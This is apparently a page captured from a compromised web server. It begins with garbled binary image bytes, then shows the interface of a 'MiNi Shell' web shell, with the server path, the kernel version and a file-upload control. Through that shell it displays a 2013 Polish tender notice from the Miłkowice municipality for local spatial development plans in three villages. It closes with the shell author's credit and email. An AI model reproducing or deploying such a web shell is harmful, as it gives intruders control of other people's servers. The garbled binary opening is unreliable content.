JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131003/400636-N-2013.html

<p class="kh_header"><b>Miłkowice: Sporządzenie zmiany miejscowych planów zagospodarowania przestrzennego terenów położonych w obrębie wsi Głuchowice i Kochlice oraz sporządzenie miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie miejscowości Lipce z podziałem na zadania.</b><br>
<b>Numer ogłoszenia: 400636 - 2013; data zamieszczenia: 03.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miłkowice , ul. II Armii Wojska Polskiego 71, 59-222 Miłkowice, woj. dolnośląskie, tel. 076 8871212, faks 076 8871213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.ug-milkowice.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie zmiany miejscowych planów zagospodarowania przestrzennego terenów położonych w obrębie wsi Głuchowice i Kochlice oraz sporządzenie miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie miejscowości Lipce z podziałem na zadania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sporządzenie zmiany miejscowych planów zagospodarowania przestrzennego terenów położonych w obrębie wsi Głuchowice i Kochlice oraz sporządzenie miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie miejscowości Lipce z podziałem na zadania.
B.	Opis przedmiotu zamówienia:
Sporządzenie zmiany miejscowych planów zagospodarowania przestrzennego terenów położonych w obrębie wsi Głuchowice i Kochlice oraz sporządzenie miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie miejscowości Lipce z podziałem na zadania.
Przedmiot zamówienia został podzielony na 3 zadania ( części):
Zadanie nr 1
Sporządzenie zmiany miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie  wsi  Głuchowice.
Zamówienie obejmuje opracowanie kompletnej, z punktu widzenia obowiązujących przepisów prawa a szczególnie ustawy z 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym wraz z rozporządzeniami wykonawczymi do niej i przepisami pokrewnymi, dokumentacji planistycznej pn. zmiana miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie wsi Głuchowice wraz z kompletem dokumentów formalno - prawnych ilustrujących przebieg procedury sporządzania i uchwalenia planu miejscowego.
Teren opracowania.
Opracowanie obejmuje ok. 180 ha terenów wsi Głuchowice, co stanowi ok. 2,1% pow. Gminy (zgodnie z załącznikiem graficznym do uchwały Rady Gminy Miłkowice nr XIX/117/2012 z dnia 22 maja 2012r. w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie wsi Głuchowice, gmina Miłkowice). Obecnie dla powyższego terenu obowiązuje miejscowy plan zagospodarowania przestrzennego - Uchwała Nr XXX/153/08 Rady Gminy Miłkowice z dnia 26 września 2008r. w sprawie uchwalenia miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębach wsi Dobrzejów, Głuchowice, Kochlice i Rzeszotary, ogłoszonego w Dzienniku Urzędowym Województwa Dolnośląskiego dnia 31.10.2008r. pod nr 289, poz. 3157.
Miejscowość Głuchowice aktualnie zamieszkuje 135 mieszkańców. Analiza struktury użytkowania gruntów w gminie daje podstawy założyć iż w terenie, który będzie przedmiotem opracowania zmiany planu, ok. 60% to grunty będące własnością osób fizycznych.
 Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy 	Miłkowice.
Ustalenia obowiązującego studium pozwalają założyć zainwestowanie terenów w ok. 50%. Z ważniejszych   uwarunkowań zagospodarowania terenów objętych opracowaniem należy wymienić m.in.:
- rezerwę pod projektowaną drogę ekspresową S-3 (wschodnia część obrębu geodezyjnego),
- drogi powiatowe nr 2208D oraz 1227D,
- udokumentowane złoża węgla brunatnego (cały obręb geodezyjny),
- obszar zbiornika wód podziemnych (północno - zachodnia część obrębu geodezyjnego),
- obszar graniczy z gminą Lubin.
Na sposób zagospodarowania tych terenów będą miały wpływ ustalone zgodnie ze studium kierunki zagospodarowania, m.in.: 
- zabudowa mieszkaniowa jednorodzinna i zagrodowa w obrębie wsi,
- tereny sportu i rekreacji,
- tereny rolnicze i przeznaczone pod zalesienie.
Aktualnie zgodnie z uchwałą Rady Gminy Miłkowice nr  XVI1052012 z dnia 3 lutego 2012r. sporządzana jest zmiana studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Miłkowice. Obecnie szykowane jest ponowne wyłożenie studium do wglądu publicznego. Przewidywany termin zakończenia prac projektowych koniec bieżącego roku.
 Zakres opracowania.
Miejscowy plan zagospodarowania przestrzennego powinien być sporządzony na podstawie ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym oraz innych przepisów pokrewnych oraz zweryfikować istniejące dokumenty planistyczne w tym plany przyległe do opracowania, istniejące i będące w opracowywaniu.
Zadanie nr 2
Sporządzenie zmiany miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie wsi Kochlice.
Zamówienie obejmuje opracowanie kompletnej, z punktu widzenia obowiązujących przepisów prawa a szczególnie ustawy z 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym wraz z rozporządzeniami wykonawczymi do niej i przepisami pokrewnymi, dokumentacji planistycznej pn. zmiana miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie wsi Kochlice wraz z kompletem dokumentów formalno - prawnych ilustrujących przebieg procedury sporządzania i uchwalenia planu miejscowego.
Teren opracowania.
Opracowanie obejmuje ok. 603 ha terenów wsi Kochlice, co stanowi ok. 7% pow. Gminy (zgodnie z załącznikiem graficznym do uchwały Rady Gminy Miłkowice nr XIX/120/2012 z dnia 22 maja 2012r. w sprawie przystąpienia do sporządzenia zmiany miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie wsi Kochlice, gmina Miłkowice). Obecnie dla powyższego terenu obowiązuje miejscowy plan zagospodarowania przestrzennego - Uchwała Nr X/72/2011 Rady Gminy Miłkowice z dnia 5 sierpnia 2011r. w sprawie uchwalenia miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie wsi Kochlice, ogłoszonego w Dzienniku Urzędowym Województwa Dolnośląskiego dnia 23.09.2011r. pod nr 176, poz. 3443.
Miejscowość Kochlice aktualnie zamieszkuje 271 mieszkańców. Analiza struktury użytkowania gruntów w gminie daje podstawy założyć iż w terenie, który będzie przedmiotem opracowania zmiany planu, ok. 42% to grunty będące własnością osób fizycznych.
 Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy 	Miłkowice.
Ustalenia obowiązującego studium pozwalają założyć zainwestowanie terenów w ok. 40%. Z ważniejszych uwarunkowań zagospodarowania terenów objętych opracowaniem należy wymienić m.in.:
- rezerwę pod projektowaną drogę ekspresową S3 (środkowa część obrębu geodezyjnego),
- drogę krajową nr 3,
- drogę powiatową nr 1227D,
- udokumentowane złoża węgla brunatnego (cały obręb geodezyjny),
- strefy Ai B ochrony konserwatorskiej (w okolicy ruin pałacu w Kochlicach),
- obszar graniczy z gminą Lubin.
Na sposób zagospodarowania tych terenów będą miały wpływ ustalone zgodnie ze studium kierunki zagospodarowania, m.in.: 
- zabudowa mieszkaniowa jednorodzinna i zagrodowa w obrębie wsi,
- tereny mieszkaniowe i mieszkaniowo - usługowe,
- tereny przemysłowe i komunikacji samochodowej,
- tereny sportu i rekreacji,
- tereny rolnicze i przeznaczone pod zalesienie.
Aktualnie zgodnie z uchwałą Rady Gminy Miłkowice nr  XVI1052012 z dnia 3 lutego 2012r. sporządzana jest zmiana studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Miłkowice. Obecnie szykowane jest ponowne wyłożenie studium do wglądu publicznego. Przewidywany termin zakończenia prac projektowych koniec bieżącego roku.
 Zakres opracowania.
Miejscowy plan zagospodarowania przestrzennego powinien być sporządzony na podstawie ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym oraz innych przepisów pokrewnych oraz zweryfikować istniejące dokumenty planistyczne w tym plany przyległe do opracowania, istniejące i będące w opracowywaniu.
Zadanie nr 3
Sporządzenie miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie miejscowości Lipce.
Zamówienie obejmuje opracowanie kompletnej, z punktu widzenia obowiązujących przepisów prawa a szczególnie ustawy z 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym wraz z rozporządzeniami wykonawczymi do niej i przepisami pokrewnymi, dokumentacji planistycznej pn. miejscowy planu zagospodarowania przestrzennego terenu położonego w obrębie miejscowości Lipce wraz z kompletem dokumentów formalno - prawnych ilustrujących przebieg procedury sporządzania i uchwalenia planu miejscowego.
 Teren opracowania.
Opracowanie obejmuje ok. 40 ha terenów obrębu wsi Lipce, co stanowi ok. 0,5% pow. Gminy (zgodnie z załącznikiem graficznym do uchwały Rady Gminy Miłkowice nr XXXVIII2242013 z dnia 18 lipca 2013r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie miejscowości Lipce, gmina Miłkowice). Obecnie dla powyższego terenu obowiązuje miejscowy plan zagospodarowania przestrzennego - Uchwała Nr X732011 Rady Gminy Miłkowice z dnia 5 sierpnia 2011r. w sprawie uchwalenia miejscowego planu zagospodarowania przestrzennego terenu położonego w obrębie miejscowości Lipce, ogłoszonego w Dzienniku Urzędowym Województwa Dolnośląskiego dnia 23.09.2011r. pod nr 197, poz. 3444.
 Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Miłkowice.
Ustalenia obowiązującego studium pozwalają założyć zainwestowanie terenów w ok. 90%. Z ważniejszych uwarunkowań zagospodarowania terenów objętych opracowaniem należy wymienić m.in.:
- wyjazd z terenu na drogę krajową nr 94,
- obszar graniczy z gminą Krotoszyce.
Na sposób zagospodarowania tych terenów będą miały wpływ ustalone zgodnie ze studium kierunki zagospodarowania, m.in.: 
- zabudowa mieszkaniowa jednorodzinna,
- tereny przeznaczone pod zalesienie.
Aktualnie zgodnie z uchwałą Rady Gminy Miłkowice nr  XVI1052012 z dnia 3 lutego 2012r. sporządzana jest zmiana studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Miłkowice. Obecnie szykowane jest ponowne wyłożenie studium do wglądu publicznego. Przewidywany termin zakończenia prac projektowych koniec bieżącego roku.
 Zakres opracowania.
Miejscowy plan zagospodarowania przestrzennego powinien być sporządzony na podstawie ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym oraz innych przepisów pokrewnych oraz zweryfikować istniejące dokumenty planistyczne w tym plany przyległe do opracowania, istniejące i będące w opracowywaniu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaże, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli 	okres działalności jest krótszy, w tym okresie, zrealizował z należytą starannością co najmniej jeden miejscowy plan zagospodarowania przestrzennego o powierzchni opracowania minimum 100 ha.
Przez realizację planu zamawiający rozumie opublikowanie uchwały w Dzienniku Urzędowym Województwa.
załączy dowody, czy wykazane usługi zostały wykonane należycie.
Sprawdzenie wyżej wymienionego warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu usług i przedłożonych przez Wykonawcę poświadczeń oświadczeń według zasady spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaże, że dysponuje lub będzie dysponować minimum jedną osobą posiadającą 	uprawnienia urbanistyczne zgodnie z ustawą o  planowaniu i zagospodarowaniu 	przestrzennym (Dz.U. z 2003r. Nr 80 poz. 717 z późn. zm.).
Sprawdzenie wyżej wymienionego warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu usług i przedłożonych przez Wykonawcę poświadczeń/oświadczeń według zasady spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz oferty - Załącznik nr 1 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość dokonania zmian postanowień zawartej umowy w 	stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w 	przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, w 	zakresie:
2.1.	Zmiany terminu realizacji zadania: 
a)Zmiany przepisów powodujących konieczność innych rozwiązań niż zakładano w opisie przedmiotu zamówienia.
b)Zmiany przepisów powodujących konieczność uzyskania dokumentów, które te 	przepisy narzucają.
c) Gdy organy i instytucje uzgadniające nie wydały uzgodnień w ustawowym terminie. 
d) Termin realizacji Etapu I może ulec przesunięciu w przypadku opóźnienia wynikającego z konieczności pozyskania map o których mowa w §3 ust.1 umowy,
 e)Termin realizacji Etapu III może ulec przedłużeniu w przypadku oczekiwania na ustalenie terminu posiedzenia Gminnej Komisji Urbanistyczno - Architektonicznej,
 f)Termin realizacji Etapu IV może ulec przedłużeniu w przypadku:
1) konieczności powtórzenia procedury uzgadniania w wyniku wprowadzonych zmian na podstawie otrzymanych opinii i uzgodnień,
 2) oczekiwania na zgodę na zmianę przeznaczenia gruntów rolnych i leśnych na cele  nierolnicze i nieleśne,
3) konieczności powtórzenia procedury w niezbędnym zakresie w wyniku      wprowadzonych zmian wynikających z uwzględnienia złożonych uwag do projektu      planu;
g) Termin realizacji Etapu VI może ulec przedłużeniu w przypadku:
1) oczekiwania na sesję Rady Gminy Miłkowice.
2.2.	Zmian osobowych:
a)zmiany osób realizujących zamówienie  pod warunkiem, że osoby te będą spełniały wymagania określone w SIWZ;
b)zmiany osób reprezentujących w przypadku zmian organizacyjnych;
c)zmiana podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot 	umowy; zmiana jest możliwa tylko w przypadku, gdy nowy podwykonawca posiada 	tożsamą wiedzę i doświadczenie zawodowe, potencjał techniczny oraz osoby zdolne do wykonania zamówienia a także jest w sytuacji ekonomiczniej i finansowej, 
jak dotychczasowy podwykonawca,
d)rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie 	Wykonawcy, o ile posłużenie się podwykonawcą doprowadzi do skrócenia terminu 	wykonania przedmiotu umowy, zmniejszenia należnego Wykonawcy wynagrodzenia  lub zastosowania przy wykonaniu przedmiotu umowy bardziej zaawansowanych rozwiązań w porównaniu do wskazanych w SIWZ. Zmiana ta nie może dotyczyć czynności, które 	zgodnie z SIWZ muszą być wykonane przez Wykonawcę osobiście.
2.3.Pozostałych zmian: 
a)w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego (np.: powoduje skrócenie terminu realizacji umowy, zmniejszenie wartości zamówienia);
b)w przypadku urzędowej zmiany wysokości podatku VAT, dopuszcza się możliwość sporządzenia  aneksu  do  umowy  uwzględniającego zmianę wartości umowy z tego tytułu;
c)rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia i udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami;
d)zmiana nazwy zadania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.ug-milkowice.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Miłkowice
ul. II Armii Wojska Polskiego 71
59-222 Miłkowice
pok. 23a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2013 godzina 10:00, miejsce: Urząd Gminy Miłkowice
ul. II Armii Wojska Polskiego 71
59-222 Miłkowice
pok. sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com